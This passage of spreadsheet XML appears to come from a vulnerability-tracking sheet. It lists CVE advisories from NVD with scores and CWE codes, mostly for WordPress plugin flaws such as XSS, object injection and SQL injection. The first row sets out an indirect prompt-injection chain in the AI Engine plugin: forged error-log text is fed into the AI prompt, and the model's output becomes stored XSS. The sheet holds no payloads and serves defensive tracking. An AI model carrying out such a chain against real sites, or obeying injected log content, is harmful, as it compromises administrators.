        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>The AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.8.0 This is due to a chain of missing input neutralization and output escaping across the /mwai-ui/v1/chats/submit REST endpoint, the PHP error-log parser (MeowKit_MWAI_Helpers::php_error_logs), the Advisor task (Meow_MWAI_Modules_Advisor::run_advisor), and the Advisor dashboard widget (advisor_metabox): the server-parameter denylist in chat_submit strips only exact key names such as 'model' while convert_keys() later canonicalizes 'model_' back to 'model', allowing an unauthenticated caller to place an attacker-controlled string (including CR/LF) into $query-&gt;model; final_checks() throws an Exception whose message embeds that raw string, and the non-streaming, non-admin catch branch writes it to the PHP error log unmodified — creating a forged log line that the plugin's own parser subsequently returns as recent PHP-error content; run_advisor() then appends that content verbatim to the AI prompt (indirect prompt injection — CWE-1427), the returned JSON is stored in the mwai_advisor_data option with no schema validation or HTML sanitization, and advisor_metabox() concatenates the resulting 'title' and 'description' values directly into the WordPress dashboard widget without esc_html(), wp_kses(), or equivalent escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the WordPress dashboard.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96561</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96815</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Custom role Privilege Escalation in Vitepos &lt;= 3.5.0 versions.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96815</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96832</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Content Egg &lt;= 6.3.1 versions.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96832</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96833</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Ultimate Addons for Contact Form 7 &lt;= 3.5.51 versions.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96833</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97245</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Shop Worker Privilege Escalation in SureCart &lt;= 4.7.2 versions.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97245</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97256</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Page Builder by SiteOrigin &lt;= 2.36.0 versions.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97256</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97347</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>The Post Views Stats Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin's only input filter is a substring blacklist for known bot signatures (e.g. 'bot', 'spider', 'crawler'), which can be trivially bypassed by crafting a User-Agent payload that omits those strings.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97347</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100507</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in If-So Dynamic Content Personalization &lt;= 1.10.1 versions.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100507</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100510</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Post and Page Builder by BoldGrid &lt;= 1.27.14 versions.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100510</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102109</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability existed in Kiteworks Secure Data Forms, where a value derived from the authenticated user's stored account data was incorporated into a database query without proper sanitization. An authenticated user could potentially influence that value to inject SQL. Exploitation requires an authenticated session and applies only to deployments where a specific optional feature is in use.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102109</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102376</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Branda &lt;= 3.4.32 versions.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102376</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102385</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ninja Forms &lt;= 3.15.3 versions.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102385</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102391</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.4 versions.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102391</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102395</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Easy Google Maps &lt;= 1.14.6 versions.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102395</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102396</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ultimate Maps by Supsystic &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102396</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102398</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Popup by Supsystic &lt;= 1.13.1 versions.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102398</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102456</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read database contents.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102456</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102457</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
